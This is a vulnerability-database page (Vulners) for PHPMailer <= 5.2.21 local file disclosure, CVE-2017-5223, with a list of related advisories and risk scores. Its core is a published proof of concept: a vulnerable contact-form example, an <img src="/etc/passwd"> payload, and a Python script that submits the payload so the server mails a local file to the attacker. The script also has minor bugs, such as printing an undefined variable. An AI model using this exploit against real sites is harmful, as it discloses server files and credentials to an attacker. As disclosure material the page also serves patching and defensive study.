Vulners
Lucene search
PHPMailer < 5.2.21 - Local File Disclosure
| Reporter | Title | Published | Views | Family All 49 |
|---|---|---|---|---|
 | PHPMailer 5.2.21 Local File Disclosure Exploit | 26 Oct 201700:00 | – | zdt |
 | phpmailer -- Remote Code Execution | 10 Jan 201700:00 | – | freebsd |
 | Security fix for the ALT Linux 9 package phpipam version 1.27.002-alt1 | 10 Jan 201700:00 | – | altlinux |
 | PHPMailer Information Disclosure Vulnerability | 12 Jan 201700:00 | – | cnvd |
| PHPMailer Arbitrary File Read Vulnerability | 3 Feb 201700:00 | – | cnvd |
 | PHPMailer Local Information Disclosure (CVE-2017-5223) - Ver2 | 11 Apr 201800:00 | – | checkpoint_advisories |
 | CVE-2017-5223 | 16 Jan 201706:00 | – | cve |
 | CVE-2017-5223 | 16 Jan 201706:00 | – | cvelist |
 | [SECURITY] [DLA 1591-1] libphp-phpmailer security update | 23 Nov 201809:41 | – | debian |
| [SECURITY] [DLA 817-1] libphp-phpmailer security update | 6 Feb 201709:00 | – | debian |
10
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
// PoC //
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
// vulnerable form example //
<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>
// exploit //
Put <img src="/etc/passwd"> in the message (or other file to disclose).
// python code //
#!/usr/bin/python
import urllib
import urllib2
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print htmlData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Oct 2017 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 22.1
CVSS 35.5
EPSS0.02922